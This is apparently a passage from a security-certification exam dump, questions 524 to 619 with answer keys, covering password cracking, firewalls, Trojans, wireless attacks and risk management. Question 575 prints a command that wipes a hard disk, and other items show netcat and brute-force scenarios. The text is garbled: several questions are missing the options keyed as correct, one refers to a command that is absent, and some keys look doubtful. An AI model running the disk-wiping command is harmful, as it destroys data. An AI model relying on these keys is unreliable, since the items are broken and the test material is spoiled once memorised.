process had been automated using basic scripting. Even worse, the new automated method for bringing down
the server has already been used to perform denial of service attacks on many large commercial websites.
Select the best answer.
A. Microsoft Corporation is the exploit.

B. The security "hole" in the product is the exploit.
C. Windows 2003 Server
D. The exploit is the hacker that would use this vulnerability.
E. The documented method of how to use the vulnerability to gain unprivileged access.
Correct Answer: E
Section: (none)
Explanation
QUESTION 524
Samuel is the network administrator of DataX communications Inc. He is trying to configure his firewall to block
password brute force attempts on his network. Heenables blocking the intruder's IP address for a period of 24
hours time after more than three unsuccessful attempts. He is confident that this rule will secure his network
hackers on the Internet.
But he still receives hundreds of thousands brute-force attempts generated from various IP addresses around
the world. After some investigation he realizes that the intruders are using a proxy somewhere else on the
Internet which has been scripted to enable the random usage of various proxies on each request so as not to
get caught by the firewall use.
Later he adds another rule to his firewall and enables small sleep on the password attempt so that if the
password is incorrect, it would take 45 seconds to returnto the user to begin another attempt. Since an intruder
may use multiple machines to brute force the password, he also throttles the number of connections that will be
prepared to accept from a particular IP address. This action will slow the intruder's attempts.
Samuel wants to completely block hackers brute force attempts on his network.
What are the alternatives to defending against possible brute-force password attacks on his site?
A. Enforce a password policy and use account lockouts after three wrong logon attempts even through this
might lock out legit users
B. Enable the IDS to monitor the intrusion attempts and alert you by e-mail about the IP address of the intruder
so that you can block them at the firewall manually
C. Enforce complex password policy on your network so that passwords are more difficult to brute force
D. You can't completely block the intruders attempt if they constantly switch proxies
Correct Answer: D
Section: (none)
Explanation
QUESTION 525
Which of the following are well know password-cracking programs?(Choose all that apply.)
A. L0phtcrack
B. NetCat
C. Jack the Ripper
D. Netbus
E. John the Ripper
Correct Answer: AE
Section: (none)
Explanation
QUESTION 526
Which type of access control is used on a router or firewall to limit network activity?
A. Mandatory
B. Discretionary
C. Rule-based
D. Role-based
Correct Answer: C
Section: (none)
Explanation
QUESTION 527
At a Windows Server command prompt, which command could be used to list the running services?
A. Sc query type=running
B. Sc query \\servername
C. Sc query
D. Sc config
Correct Answer: C
Section: (none)
Explanation
QUESTION 528
Windows file servers commonly hold sensitive files, databases, passwords and more. Which of the following
choices would be a common vulnerability that usually exposes them?
B. SQL injection
C. Missing patches
D. CRLF injection
Correct Answer: C
Section: (none)
Explanation
QUESTION 529
While conducting a penetration test, the tester determines that there is a firewall between the tester's machine
and the target machine. The firewallis only monitoring TCP handshaking of packets at the session layer of the
OSI model. Which type of firewall is the tester trying to traverse?
A. Packet filteringfirewall
B. Application-levelfirewall
C. Circuit-level gatewayfirewall
D. Stateful multilayer inspection firewall
Correct Answer: C
Section: (none)
Explanation
QUESTION 530
A company firewall engineer has configured a new DMZ to allow public systems to be located away from the
internal network. The engineer has three security zones set:
(Remote network = 217.77.88.0/24) DMZ (DMZ) (11.12.13.0/24)

Untrust (Internet)
(192.168.0.0/24)
Trust (Intranet)
The engineer wants to configure remote desktop access from a fixed IP on the remote network to a remote
desktop server in the DMZ. Which rule would bestfit this requirement?
A. Permit 217.77.88.0/24 11.12.13.0/24 RDP 3389

B. Permit 217.77.88.12 11.12.13.50 RDP 3389
C. Permit 217.77.88.12 RDP 3389
11.12.13.0/2
D. Permit 217.77.88.0/24 11.12.13.50 RDP 3389
Correct Answer: B
Section: (none)
Explanation
QUESTION 531
A circuit level gateway works at which of the following layers of the OSI Model?
A. Layer 5 - Application
TCP
B. Layer 4
Internet protocol
C. Layer 3
Data link
D. Layer 2
Correct Answer: B
Section: (none)
Explanation
QUESTION 532
Which of the following is a symmetric cryptographic standard?
A. DSA
B. PKI
C. RSA
D. 3DES
Correct Answer: D
Section: (none)
Explanation
QUESTION 533
A computer science student needs to fill some information into a secured Adobe PDF job application that was
received from a prospective employer. Instead ofrequesting a new document that allowed the forms to be
completed, the student decides to write a script that pulls passwords from a list of commonly used passwords
to try against the secured PDF until the correct password is found or the list is exhausted.
Which cryptography attack is the student attempting?
A. Man-in-the-middle attack
B. Brute-force attack
D. Session hijacking
Correct Answer: C
Section: (none)
Explanation
QUESTION 534
Which property ensures that a hash function will not produce the same hashed value for two different
messages?
A. Collision resistance
B. Bit length
C. Key strength
D. Entropy
Correct Answer: A
Section: (none)
Explanation
QUESTION 535
How can telnet be used to fingerprint a web server?
A. telnet webserverAddress 80HEAD / HTTP/1.0

B. telnet webserverAddress 80PUT / HTTP/1.0
C. telnet
webserverAddress 80HEAD / HTTP/2.0
D. telnet
webserverAddress 80PUT / HTTP/2.0
Correct Answer: A
Section: (none)
Explanation
QUESTION 536
Low humidity in a data center can cause which of the following problems?
A. Heat
B. Corrosion
C. Static electricity
D. Airborne contamination
Correct Answer: C
Section: (none)
Explanation
QUESTION 537
A consultant is hired to do physical penetration testing at a large financial company. In the first day of his
assessment, the consultant goes to the company`s building dressed like an electrician and waits in the lobby for
an employee to pass through the main access gate, then the consultant follows the employeebehind to get into
the restricted area. Which type of attack did the consultant perform?
A. Man trap
B. Tailgating
C. Shoulder surfing
D. Social engineering
Correct Answer: B
Section: (none)
Explanation
QUESTION 538
When analyzing the IDS logs, the system administrator noticed an alert was logged when the external router
was accessed from the administrator'scomputer to update the router configuration. What type of an alert is
this?
A. False positive
B. False negative
C. True positve
D. True negative
Correct Answer: A
Section: (none)
Explanation
QUESTION 539
While performing data validation of web content, a security technician is required to restrict malicious input.
Which of the following processes is an efficient way of restricting malicious input?
A. Validate web content input for query strings.

B. Validate web content input with scanning tools.
C. Validate web content input for type, length, and range.
D. Validate web content input for extraneous queries.
Correct Answer: C
Section: (none)
Explanation
QUESTION 540
A security consultant decides to use multiple layers of anti-virus defense, such as end user desktop anti-virus
and E-mail gateway. This approach can be usedto mitigate which kind of attack?
A. Forensic attack
B. ARP spoofing attack
C. Social engineering attack
D. Scanning attack
Correct Answer: C
Section: (none)
Explanation
QUESTION 541
Which of the following resources does NMAP need to be used as a basic vulnerability scanner covering several
vectors like SMB, HTTP and FTP?
A. Metasploit scripting engine

B. Nessus scripting engine
C. NMAP scripting engine
D. SAINT scripting engine
Correct Answer: C
Section: (none)
Explanation
QUESTION 542
Which of the following scanning tools is specifically designed to find potential exploits in Microsoft Windows
products?
A. Microsoft Security Baseline Analyzer

B. Retina
C. Core Impact
D. Microsoft Baseline Security Analyzer
Correct Answer: D
Section: (none)
Explanation
QUESTION 543
A security analyst is performing an audit on the network to determine if there are any deviations from the
security policies in place. The analyst discovers that a
user from the IT department had a dial-out modem installed. Which security policy must the security analyst
check to see if dial-out modems are allowed?
A. Firewall-management policy
B. Acceptable-use policy
C. Remote-access policy
D. Permissive policy
Correct Answer: C
Section: (none)
Explanation
QUESTION 544
When creating a security program, which approach would be used if senior management is supporting and
enforcing the security policy?
A. A bottom-up approach
B. A top-down approach
C. A senior creation approach
D. An IT assurance approach
Correct Answer: B
Section: (none)
Explanation
QUESTION 545
Which of the following processes evaluates the adherence of an organization to its stated security policy?
A. Vulnerability assessment
B. Penetration testing
C. Risk assessment
D. Security auditing
Correct Answer: D
Section: (none)
Explanation
QUESTION 546
A security consultant is trying to bid on a large contract that involves penetration testing and reporting. The
company accepting bids wants proof of work so the consultant prints out several audits that have been
performed. Which of the following is likely to occur as a result?
A. The consultant will ask for money on the bid because of great work.
B. The consultant may expose vulnerabilities of other companies.
C. The company accepting bids will want the same type of format of testing.
D. The company accepting bids will hire the consultant because of the great work performed.
Correct Answer: B
Section: (none)
Explanation
QUESTION 547
Which type of scan is used on the eye to measure the layer of blood vessels?
A. Facial recognition scan

B. Retinal scan
C. Iris scan
D. Signature kinetics scan
Correct Answer: B
Section: (none)
Explanation
QUESTION 548
What is the main reason the use of a stored biometric is vulnerable to an attack?
A. The digital representation of the biometric might not be unique, even if the physical characteristic is unique.
B. Authentication using a stored biometric compares a copy to a copy instead of the original to a copy.
C. A stored biometric is no longer "something you are" and instead becomes "something you have".
D. A stored biometric can be stolen and used by an attacker to impersonate the individual identified by the
biometric.
Correct Answer: D
Section: (none)
Explanation
QUESTION 549
During a wireless penetration test, a tester detects an access point using WPA2 encryption. Which of the
following attacks should be used to obtain the key?
A. The tester must capture the WPA2 authentication handshake and then crack it.
B. The tester must use the tool inSSIDer to crack it using the ESSID of the network.
C. The tester cannot crack WPA2 because it is in full compliance with the IEEE 802.11i standard.
D. The tester must change the MAC address of the wireless network card and then use the AirTraf tool to
obtain the key.
Correct Answer: A
Section: (none)
Explanation
QUESTION 550
Which type of antenna is used in wireless communication?
A. Omnidirectional
B. Parabolic
C. Uni-directional
D. Bi-directional
Correct Answer: A
Section: (none)
Explanation
QUESTION 551
In the context of Trojans, what is the definition of a Wrapper?
A. An encryption tool to protect the Trojan.

B. A tool used to bind the Trojan with legitimate file.
C. A tool used to encapsulated packets within a new header and footer.
D. A tool used to calculate bandwidth and CPU cycles wasted by the Trojan.
Correct Answer: B
Section: (none)
Explanation
QUESTION 552
A Security Engineer at a medium-sized accounting firm has been tasked with discovering how much
information can be obtained from the firm's public facing web servers. The engineer decides to start by using
netcat to port 80.
The engineer receives this output:
HTTP/1.1 200 OK
Server: Microsoft-IIS/6
Expires: Tue, 17 Jan 2011 01:41:33 GMT
Date: Mon, 16 Jan 2011 01:41:33 GMT
Content-Type:
text/html Accept-Ranges: bytes
Last-Modified: Wed, 28 Dec 2010 15:32:21GMT ETag: "b0aac0542e25c31:89d" Content-Length: 7369
Which of the following is an example of what the engineer performed?
B. Banner grabbing
C. SQL injection
D. Whois database query
Correct Answer: B
Section: (none)
Explanation
QUESTION 553
An NMAP scan of a server shows port 69 is open. What risk could this pose?
A. Unauthenticated access
B. Weak SSL version
C. Cleartext login
D. Web portal data leak
Correct Answer: A
Section: (none)
Explanation
QUESTION 554
What information should an IT system analysis provide to the risk assessor?
A. Management buy-in
B. Threat statement
C. Security architecture
D. Impact analysis
Correct Answer: C
Section: (none)
Explanation
QUESTION 555
Which results will be returned with the following Google search query?site:target.com -
site:Marketing.target.com accounting
A. Results matching all words in thequery

"accounting" in domain target.com but not on the site Marketing.target.com
B. Results matching
C. Results from matches on the site marketing.target.com that are in the domain target.com but do not include
the word accounting "accounting"
D. Results for matches on target.com and Marketing.target.com that include the word
Correct Answer: B
Section: (none)
Explanation
QUESTION 556
A bank stores and processes sensitive privacy information related to home loans. However, auditing has never
been enabled on the system. What is the first step that the bank should take before enabling the audit feature?
A. Perform a vulnerability scan of the system.

B. Determine the impact of enabling the audit feature.
C. Perform a cost/benefit analysis of the audit feature.
D. Allocate funds for staffing of audit logreview.
Correct Answer: B
Section: (none)
Explanation
QUESTION 557
Which of the following is a preventive control?
A. Smart card authentication

B. Security policy
C. Audit trail
D. Continuity of operationsplan
Correct Answer: A
Section: (none)
Explanation
QUESTION 558
Which of the following is considered an acceptable option when managing a risk?
A. Reject the risk.

B. Deny the risk.
C. Mitigate the risk.
D. Initiate the risk.
Correct Answer: C
Section: (none)
Explanation
QUESTION 559
Which security control role does encryption meet?
A. Preventative
B. Detective
C. Offensive
D. Defensive
Correct Answer: A
Section: (none)
Explanation
QUESTION 560
A covert channel is a channel that
A. transfers information over, within a computer system, or network that is outside of the security policy.
B. transfers information over, within a computer system, or network that is within the security policy.
C. transfers information via a communication path within a computer system, or network for transfer of data.
D. transfers information over, within a computer system, or network that is encrypted.
Correct Answer: A
Section: (none)
Explanation
QUESTION 561
John the Ripper is a technical assessment tool used to test the weakness of which of the following?
A. Usernames
B. File permissions
C. Firewall rulesets
D. Passwords
Correct Answer: D
Section: (none)
Explanation
QUESTION 562
Least privilege is a security concept that requires that a user is
A. limited to those functions required to do the job.

B. given root or administrative privileges.
C. trusted to keep all data and access to that data under their sole control.
D. given privileges equal to everyone else in the department.
Correct Answer: A
Section: (none)
Explanation
QUESTION 563
If the final set of security controls does not eliminate all risk in a system, what could be done next?
A. Continue to apply controls until there is zero risk.

B. Ignore any remaining risk.
C. If the residual risk is low enough, it can be accepted.
D. Remove current controls since they are not completely effective.
Correct Answer: C
Section: (none)
Explanation
QUESTION 564
What is one thing a tester can do to ensure that the software is trusted and is not changing or tampering with
critical data on the back end of a system it is loaded on?
A. Proper testing
B. Secure coding principles
C. Systems securityand architecture review
D. Analysis of interrupts within the software
Correct Answer: D
Section: (none)
Explanation
QUESTION 565
Which of the following examples best represents a logical or technical control?
A. Security tokens
B. Heating and air conditioning
C. Smoke and fire alarms
D. Corporate security policy
Correct Answer: A
Section: (none)
Explanation
QUESTION 566
Michael is the security administrator for the for ABC company. Michael has been charged with strengthening
the company's security policies, including its password policies. Due to certain legacy applications. Michael was
only able to enforce a password group policy in Active Directory with a minimum of 10 characters. He has
informed the company's employes, however that the new password policy requires that everyone must have
complex passwords with at least 14 characters. Michael wants to ensure that everyone is using complex
passwords that meet the new security policy requirements. Michael has just logged on to one of the network's
domaincontrollers and is about to run the following command:
What will this command accomplish?
A. Dumps SAM password hashes topwd.txt

B. Password history file is piped to pwd.txt
C. Dumps Active Directory password hashes to pwd.txt
D. Internet cache file is piped topwd.txt
Correct Answer: A
Section: (none)
Explanation
QUESTION 567
You have successfully brute forced basic authentication configured on a Web Server using Brutus hacking tool.
The username/password is "Admin" and "Bettlemani@". You logon to the system using the brute forced
password and plant backdoors and rootkits.
After downloading various sensitive documents from the compromised machine, you proceed to clear the log
files to hide your trace.. Which event log
located atC:\Windows\system32\config contains the trace of your brute force attempts?
A. AppEvent.Evt
B. SecEvent.Evt
C. SysEvent.Evt
D. WinEvent.Evt
Correct Answer: B
Section: (none)
Explanation
QUESTION 568
Assuring two systems that are using IPSec to protect traffic over the internet, what type of general attack could
compromise the data?
A. Spoof Attack
B. Smurf Attack
C. Man in the Middle Attack
D. Trojan Horse Attack
E. Back Orifice Attack
Correct Answer: DE
Section: (none)
Explanation
QUESTION 569
What is a Trojan Horse?
A. A malicious program that captures your username and password

B. Malicious code masquerading as or replacing legitimate code
C. An unauthorized user who gains access to your user database and adds themselves as a user
D. A server that is to be sacrificed to all hacking attempts in order to log and monitor the hacking activity
Correct Answer: B
Section: (none)
Explanation
QUESTION 570
You want to use netcat to generate huge amount of useless network data continuously for various performance
testing between 2 hosts. Which of the
followingcommands accomplish this?
A. Machine A
#yes AAAAAAAAAAAAAAAAAAAAAA | nc v v l p 2222 > /dev/null Machine B #yes
BBBBBBBBBBBBBBBBBBBBBB | nc machinea 2222 > /dev/null
B. Machine A
cat somefile | nc v v l p 2222 Machine B cat somefile | nc othermachine 2222
C. Machine A
nc l p 1234 | uncompress c | tar xvfp Machine B
tar cfp - /some/dir | compress c | nc w 3 machinea 1234
D. Machine A while true : do
nc v l s p 6000 machineb 2 Machine B while true ; donc v l s p 6000 machinea 2 done
Correct Answer: A
Section: (none)
Explanation
QUESTION 571
Travis works primarily from home as a medical transcriptions.
He just bought a brand new Dual Core Pentium Computer with over 3 GB of RAM. He uses voice recognition
software is processor intensive, which is whyhe bought the new computer. Travis frequently has to get on the
Internet to do research on what he is working on. After about two months of working on his new computer, he
notices that it is not running nearly as fast as it used to.
Travis uses antivirus software, anti-spyware software and always keeps the computer up- to-date with Microsoft
patches.
After another month of working on the computer, Travis computer is even more noticeable slow. Every once in
awhile, Travis also notices a window or two pop-up on his screen, but they quickly disappear. He has seen
these windows show up, even when he has not been on the Internet. Travis is really worried about his computer
because he spent a lot of money on it and he depends on it to work. Travis scans his through Windows
Explorer and check out the file system, folder by folder to see if there is anything he can find. He spends over
four hours pouring over the files and folders and can't find anything but before he gives up, he notices that his
computer only has about 10 GB of free space available. Since has drive is a 200 GB hard drive, Travis thinks
this is very odd.
Travis downloads Space Monger and adds up the sizes for all the folders and files on his computer. According
to his calculations, he should have around 150GB of free space.
What is mostly likely the cause of Travi's problems?
A. Travis's Computer is infected with stealth kernel level rootkit

B. Travi's Computer is infected with Stealth Torjan Virus
C. Travis's Computer is infected with Self-Replication Worm that fills the hard disk space
D. Logic Bomb's triggered at random times creating hidden data consuming junk files
Correct Answer: A
Section: (none)
Explanation
QUESTION 572
Which of the following is an attack in which a secret value like a hash is captured and then reused at a later
time to gain access to a system without ever decrypting or decoding the hash.
A. Replay Attacks
B. Brute Force Attacks
C. Cryptography Attacks
D. John the Ripper Attacks
Correct Answer: A
Section: (none)
Explanation
QUESTION 573
You are the IT Manager of a large legal firm in California. Your firm represents many important clients whose
names always must remain anonymous to the public. Your boss, Mr. Smith is always concerned about client
information being leaked or revealed to the pres or public. You have just finished a complete security overhaul
of your information system including an updated IPS, new firewall, email encryption and employee security
awareness training. Unfortunately, many of your firm's clients do not trust technology to completely secure their
information, so couriers routinely have to travel back and forth to and from the office with sensitive information.
Your boss has charged you with figuring out how to secure the information the couriers must transport. You
propose that the data be transferred using burnedCD's or USB flash drives. You initially think of encrypting the
files, but decide against that method for fear the encryption keys could eventually be broken.
What software application could you use to hide the data on the CD's and USB flash drives?
A. Snow
B. File Snuff
C. File Sneaker
D. EFS
Correct Answer: A
Section: (none)
Explanation
QUESTION 574
You are the security administrator for a large online auction company based out of Los Angeles. After getting
your ENSA CERTIFICATION last year, you havesteadily been fortifying your network's security including
training OS hardening and network security. One of the last things you just changed for security reasons was to
modify all the built-in administrator accounts on the local computers of PCs and in Active Directory. After
through testing you found and no services or programs were affected by the name changes.
Your company undergoes an outside security audit by a consulting company and they said that even through all
the administrator account names were changed, the accounts could still be used by a clever hacker to gain
unauthorized access. You argue with the auditors and say that is not possible, so they use a tool and show you
how easy it is to utilize the administrator account even though its name was changed.
What tool did the auditors use?
A. sid2user
B. User2sid
C. GetAcct
D. Fingerprint
Correct Answer: A
Section: (none)
Explanation
QUESTION 575
John Beetlesman, the hacker has successfully compromised the Linux System of Agent Telecommunications,
Inc's WebServer running Apache. Hehas downloaded sensitive documents and database files off the machine.
Upon performing various tasks, Beetlesman finally runs the following command on the Linux box
beforedisconnecting. for ((i=0;i<1;i++));do
?dd if=/dev/random of=/dev/hda && dd if=/dev/zero of=/dev/hdadone What exactly is John trying to do?
A. He is making a bit stream copy of the entire hard disk for later download
B. He is deleting log files to remove histrace
C. He is wiping the contents of the hard disk with zeros
D. He is infecting the hard disk with random virus strings
Correct Answer: C
Section: (none)
Explanation
QUESTION 576
LAN Manager passwords are concatenated to 14 bytes and split in half. The two halves are hashed individually.
If the password is 7 charactersor less, than the second half of the hash is always:
A. 0xAAD3B435B51404EE
B. 0xAAD3B435B51404AA
C. 0xAAD3B435B51404BB
D. 0xAAD3B435B51404CC
Correct Answer: A
Section: (none)
Explanation
QUESTION 577
Which of the following is the successor of SSL?
A. TLS
B. RSA
C. GRE
D. IPSec
Correct Answer: A
Section: (none)
Explanation
QUESTION 578
You are attempting to man-in-the-middle a session. Which protocol will allow you to guess a sequence
number?
A. TCP
B. UPD
C. ICMP
D. UPX
Correct Answer: A
Section: (none)
Explanation
QUESTION 579
Your team has won a contract to infiltrate an organization. The company wants to have the attack be as realistic
as possible; therefore, they did not provide any information besides the company name.
What should be the first step in security testing the client?
A. Reconnaissance
B. Enumeration
C. Scanning
D. Escalation
Correct Answer: A
Section: (none)
Explanation
QUESTION 580
Which regulation defines security and privacy controls for Federal information systems and organizations?
A. NIST-800-53
B. PCI-DSS
C. EU Safe Harbor
D. HIPAA
Correct Answer: A
Section: (none)
Explanation
QUESTION 581
How does the Address Resolution Protocol (ARP) work?
A. It sends a request packet to all the network elements, asking for the MAC address from a specific IP.
B. It sends a reply packet to all the network elements, asking for the MAC address from a specific IP.
C. It sends a reply packet for a specific IP, asking for the MAC address.
D. It sends a request packet to all the network elements, asking for the domain name from a specific IP.
Correct Answer: A
Section: (none)
Explanation
QUESTION 582
Which of the following is a design pattern based on distinct pieces of software providing application functionality
as services to other applications?
A. Service Oriented Architecture

B. Object Oriented Architecture
C. Lean Coding
D. Agile Process
Correct Answer: A
Section: (none)
Explanation
QUESTION 583
Which mode of IPSec should you use to assure security and confidentiality of data within the same LAN?
A. ESP transport mode

B. AH permiscuous
C. ESP confidential
D. AH Tunnel mode
Correct Answer: A
Section: (none)
Explanation
QUESTION 584
Which of the following is assured by the use of a hash?
A. Integrity
B. Confidentiality
C. Authentication
D. Availability
Correct Answer: A
Section: (none)
Explanation
QUESTION 585
Which of the following is the greatest threat posed by backups?
A. A backup is the source of Malware or illicit information.

B. A backup is unavailable during disaster recovery.
C. A backup is incomplete because no verification was performed.
D. An un-encrypted backup can be misplaced or stolen.
Correct Answer: D
Section: (none)
Explanation
QUESTION 586
An incident investigator asks to receive a copy of the event logs from all firewalls, proxy servers, and Intrusion
Detection Systems (IDS) on the network of an organization that has experienced a possible breach of security.
When the investigator attempts to correlate the information in all of the logs, the sequence of manyof the
logged events do not match up.
What is the most likely cause?
A. The network devices are not all synchronized.

B. Proper chain of custody was not observed while collecting the logs.
C. The attacker altered or erased events from the logs.
D. The security breach was a false positive.
Correct Answer: A
Section: (none)
Explanation
QUESTION 587
In Risk Management, how is the term "likelihood" related to the concept of "threat?"
A. Likelihood is the probability that a threat-source will exploit a vulnerability.

B. Likelihood is a possible threat-source that may exploit a vulnerability.
C. Likelihood is the likely source of a threat that could exploit a vulnerability.
D. Likelihood is the probability that a vulnerability is a threat-source.
Correct Answer: A
Section: (none)
Explanation
QUESTION 588
The chance of a hard drive failure is once every three years. The cost to buy a new hard drive is $300. It will
require 10 hours to restore the OS and software to the new hard disk. It will require a further 4 hours to restore
the database from the last backup to the new hard disk. The recovery person earns $10/hour.
Calculate theSLE, ARO, and ALE. Assume the EF = 1 (100%).
What is the closest approximate cost of this replacement and recovery operation per year?
A. $146
B. $1320
C. $440
D. $100
Correct Answer: A
Section: (none)
Explanation
QUESTION 589
A network administrator discovers several unknown files in the root directory of his Linux FTP server. One of
the files is a tarball, two are shell script files, and thethird is a binary file is named "nc." The FTP server's
access logs show that the anonymous user account logged in to the server, uploaded the files, and extracted
the contents of the tarball and ran the script using a function provided by the FTP server's software. The ps
command shows that the nc file is running as process,and the netstat command shows the nc process is
listening on a network port.
What kind of vulnerability must be present to make this remote attack possible?
A. File system permissions

B. Privilege escalation
C. Directory traversal
D. Brute force login
Correct Answer: A
Section: (none)
Explanation
QUESTION 590
While performing online banking using a Web browser, a user receives an email that contains a link to an
interesting Web site. When the user clicks on the link, another Web browser session starts and displays a
video of cats playing a piano. The next business day, the user receives what looks like an email from his
bank,indicating that his bank account has been accessed from a foreign country. The email asks the user to
call his bank and verify the authorization of a funds transferthat took place.
What Web browser-based security vulnerability was exploited to compromise the user?

C. Clickjacking
D. Web form input validation
Correct Answer: A
Section: (none)
Explanation
QUESTION 591
A company's security policy states that all Web browsers must automatically delete their HTTP browser cookies
upon terminating. What sort of security breach isthis policy attempting to mitigate?
A. Attempts by attackers to access Web sites that trust the Web browser user by stealing the user's
authentication credentials.
B. Attempts by attackers to access the user and password information stored in the company's SQL database.
C. Attempts by attackers to access passwords stored on the user's computer without the user's knowledge.
D. Attempts by attackers to determine the user's Web browser usage patterns, including when sites were
visited and for how long.
Correct Answer: A
Section: (none)
Explanation
QUESTION 592
A company's Web development team has become aware of a certain type of security vulnerability in their Web
software. To mitigate the possibility of this vulnerability being exploited, the team wants to modify the software
requirements to disallow users from entering HTML as input into their Web application.
What kind of Web application vulnerability likely exists in their software?
A. Cross-site scripting vulnerability

B. Cross-site Request Forgery vulnerability
C. SQL injection vulnerability
D. Web site defacement vulnerability
Correct Answer: A
Section: (none)
Explanation
QUESTION 593
Which of the following is considered the best way to protect Personally Identifiable Information (PII) from Web
application vulnerabilities?
A. Use cryptographic storage to store all PII

B. Use encrypted communications protocols to transmit PII
C. Use full disk encryption on all hard drives to protect PII
D. Use a security token to log into all Web applications that use PII
Correct Answer: A
Section: (none)
Explanation
QUESTION 594
Which of the following is one of the most effective ways to prevent Cross-site Scripting (XSS) flaws in software
applications?
A. Validate and escape all information sent to a server

B. Use security policies and procedures to define and implement proper security settings
C. Verify access right before allowing access to protected information and UI controls
D. Use digital certificates to authenticate a server prior to sending data
Correct Answer: A
Section: (none)
Explanation
QUESTION 595
An Internet Service Provider (ISP) has a need to authenticate users connecting using analog modems, Digital
Subscriber Lines (DSL), wireless data services, andVirtual Private Networks (VPN) over a Frame Relay
network.
Which AAA protocol is most likely able to handle this requirement?
A. RADIUS
B. DIAMETER
C. Kerberos
D. TACACS+
Correct Answer: A
Section: (none)
Explanation
QUESTION 596
A new wireless client is configured to join a 802.11 network. This client uses the same hardware and software
as many of the other clients on the network. The client can see the network, but cannot connect. A wireless
packet sniffer shows that the Wireless Access Point (WAP) is not responding to the association requestsbeing
sent by the wireless client.
What is a possible source of this problem?

client's MAC address
A. The WAP does not recognize the

B. The client cannot see the SSID of the wireless network
C. Client is configured for the wrong channel
D. The wireless client is not configured to use DHCP
Correct Answer: A
Section: (none)
Explanation
QUESTION 597
An Intrusion Detection System (IDS) has alerted the network administrator to a possibly malicious sequence of
packets sent to a Web server in the network's external DMZ. The packet traffic was captured by the IDS and
saved to a PCAP file.
What type of network tool can be used to determine if these packets are genuinely malicious or simply a false
positive?
A. Protocol analyzer
B. Intrusion Prevention System (IPS)
C. Network sniffer
D. Vulnerability scanner
Correct Answer: A
Section: (none)
Explanation
QUESTION 598
An attacker gains access to a Web server's database and displays the contents of the table that holds all of the
names, passwords, and other user information. Theattacker did this by entering information into the Web site's
user login page that the software's designers did not expect to be entered. This is an example of what kind of
software design problem?
A. Insufficient input validation

B. Insufficient exception handling
C. Insufficient database hardening
D. Insufficient security management
Correct Answer: A
Section: (none)
Explanation
QUESTION 599
Which of the following is a protocol specifically designed for transporting event messages?
A. SYSLOG
B. SMS
C. SNMP
D. ICMP
Correct Answer: A
Section: (none)
Explanation
QUESTION 600
Which of the following security operations is used for determining the attack surface of an organization?

B. Training employees on the security policy regarding social engineering
C. Reviewing the need for a security clearance for each employee
D. Using configuration management to determine when and where to apply security patches
Correct Answer: A
Section: (none)
Explanation
QUESTION 601
The security concept of "separation of duties" is most similar to the operation of which type of security device?
A. Firewall
B. Bastion host
C. Intrusion Detection System
D. Honeypot
Correct Answer: A
Section: (none)
Explanation
QUESTION 602
The "black box testing" methodology enforces which kind of restriction?
A. Only the external operation of a system is accessible to the tester.

B. Only the internal operation of a system is known to the tester.
C. The internal operation of a system is only partly accessible to the tester.
D. The internal operation of a system is completely known to the tester.
Correct Answer: A
Section: (none)
Explanation
QUESTION 603
The "gray box testing" methodology enforces what kind of restriction?
A. The internal operation of a system is only partly accessible to the tester.

B. The internal operation of a system is completely known to the tester.
C. Only the external operation of a system is accessible to the tester.
D. Only the internal operation of a system is known to the tester.
Correct Answer: A
Section: (none)
Explanation
QUESTION 604
The "white box testing" methodology enforces what kind of restriction?.
A. The internal operation of a system is completely known to the tester.

B. Only the external operation of a system is accessible to the tester.
C. Only the internal operation of a system is known to the tester.
D. The internal operation of a system is only partly accessible to the tester.
Correct Answer: A
Section: (none)
Explanation
QUESTION 605
To determine if a software program properly handles a wide range of invalid input, a form of automated testing
can be used to randomly generate invalid input in anattempt to crash the program.
What term is commonly used when referring to this type of testing?
A. Fuzzing
B. Randomizing
C. Mutating
D. Bounding
Correct Answer: A
Section: (none)
Explanation
QUESTION 606
To maintain compliance with regulatory requirements, a security audit of the systems on a network must be
performed to determine their compliance with securitypolicies. Which one of the following tools would most
likely be used in such an audit?
A. Vulnerability scanner
B. Protocol analyzer
C. Port scanner
D. Intrusion Detection System
Correct Answer: A
Section: (none)
Explanation
QUESTION 607
Which of these options is the most secure procedure for storing backup tapes?
A. In a climate controlled facility offsite

B. On a different floor in the same building
C. Inside the data center for faster retrieval in a fireproof safe
D. In a cool dry environment
Correct Answer: A
Section: (none)
Explanation
QUESTION 608
What term describes the amount of risk that remains after the vulnerabilities are classified and the
countermeasures have been deployed?
A. Residual risk
B. Inherent risk
C. Deferred risk
D. Impact risk
Correct Answer: A
Section: (none)
Explanation
QUESTION 609
Risks = Threats x Vulnerabilities is referred to as the:
A. Risk equation
B. Threat assessment
C. BIA equation
D. Disaster recovery formula
Correct Answer: A
Section: (none)
Explanation
QUESTION 610
Which of the following is designed to identify malicious attempts to penetrate systems?

B. Firewall
C. Proxy
D. Router
Correct Answer: A
Section: (none)
Explanation
QUESTION 611
Which of the following is a low-tech way of gaining unauthorized access to systems?
A. Social Engineering
B. Sniffing
C. Eavesdropping
D. Scanning
Correct Answer: A
Section: (none)
Explanation
QUESTION 612
PGP, SSL, and IKE are all examples of which type of cryptography?
A. Public Key
B. Secret Key
C. Hash Algorithm
D. Digest
Correct Answer: A
Section: (none)
Explanation
QUESTION 613
Which method of password cracking takes the most time and effort?
A. Brute force
B. Rainbow tables
D. Shoulder surfing
Correct Answer: A
Section: (none)
Explanation
QUESTION 614
"Bash Bug" or "ShellShock" vulnerability?
What is the most common method to exploit the
A. Through Web servers utilizing CGI (Common Gateway Interface) to send a malformed environment variable
to a vulnerable Web server
B. Manipulate format strings in text fields
C. SSH
D. SYN Flood
Correct Answer: A
Section: (none)
Explanation
QUESTION 615
Which of the following tools performs comprehensive tests against web servers, including dangerous files and
CGIs?
A. Nikto
B. Snort
C. John the Ripper
D. Dsniff
Correct Answer: A
Section: (none)
Explanation
QUESTION 616
Which of the following tools is used to analyze the files produced by several packet-capture programs such as
tcpdump, WinDump, Wireshark, and EtherPeek?
A. tcptrace
B. tcptraceroute
C. Nessus
D. OpenVAS
Correct Answer: A
Section: (none)
Explanation
QUESTION 617
Which of the following tools is used to detect wireless LANs using the 802.11a/b/g/n WLAN standards on a
linux platform?
A. Kismet
B. Nessus
C. Netstumbler
D. Abel
Correct Answer: A
Section: (none)
Explanation
QUESTION 618
Session splicing is an IDS evasion technique in which an attacker delivers data in multiple, smallsized packets
to the target computer, making it very difficult for anIDS to detect the attack signatures.
Which tool can be used to perform session splicing attacks?
A. Whisker
B. tcpsplice
C. Burp
D. Hydra
Correct Answer: A
Section: (none)
Explanation
QUESTION 619
Which of the following tools can be used for passive OS fingerprinting?
A. tcpdump
B. nmap
C. ping
D. tracert
